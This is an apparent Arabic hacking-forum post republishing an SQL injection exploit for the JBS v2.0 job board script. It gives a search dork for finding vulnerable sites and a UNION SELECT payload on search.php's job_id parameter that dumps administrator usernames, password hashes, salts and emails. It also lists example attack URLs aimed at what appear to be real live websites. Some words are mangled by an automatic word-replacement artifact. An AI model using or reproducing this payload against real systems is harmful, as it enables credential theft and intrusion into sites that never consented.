Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

Virus_Z Lord Of Spam
  • شكراً: 33
  • تم شكره 181 مرة في 61 مشاركة

JBS V2.0 (search.php) - SQL Injection Vulnerability
================================================== ==================

################################################## ##################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [[email protected]] , [[email protected]]
.:. Home : http://www.iphobos.com/blog/
.:. استبدال Script : http://www.jobboardاستبدال scripts.com/
.:. Dork : "Powered by JBS v2.0"
Tested On Demo : http://www.jobboardاستبدال scripts.com/job-board-demo/
################################################## ##################

################################
EXPLOIT
################################

localhost/search.php?mode=searchjobs&keywords=12&industry=&j ob_type=&job_id=12[inject]&location=&submitjob=Start+Search

localhost/search.php?mode=searchjobs&keywords=12&industry=&j ob_type=&job_id=12' and 1=2 UNION SELECT group_concat(id,0x3a,username,0x3a,password,0x3a,s alt,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14+fro m+admin-- -&location=&submitjob=Start+Search

Example:

http://www.magentorecruitment.com/se...ype=&job_id=12' and 1=2 UNION SELECT group_concat(id,0x3a,username,0x3a,password,0x3a,s alt,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14+fro m+admin-- -&location=&submitjob=Start+Search
http://www.jobboardاستبدال scripts.com/job-b...ype=&job_id=12' and 1=2 UNION SELECT group_concat(id,0x3a,username,0x3a,password,0x3a,s alt,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14+fro m+admin-- -&location=&submitjob=Start+Search

3 أعضاء قالوا شكراً لـ Virus_Z على المشاركة المفيدة:
ReD DraGon عضو مميز
  • شكراً: 295
  • تم شكره 157 مرة في 54 مشاركة

U Are Awesome

توقيع
و دڨ عليك حرس
ها مولى القزلالة
و ضاڨ النفس
و صاحت المنڨالة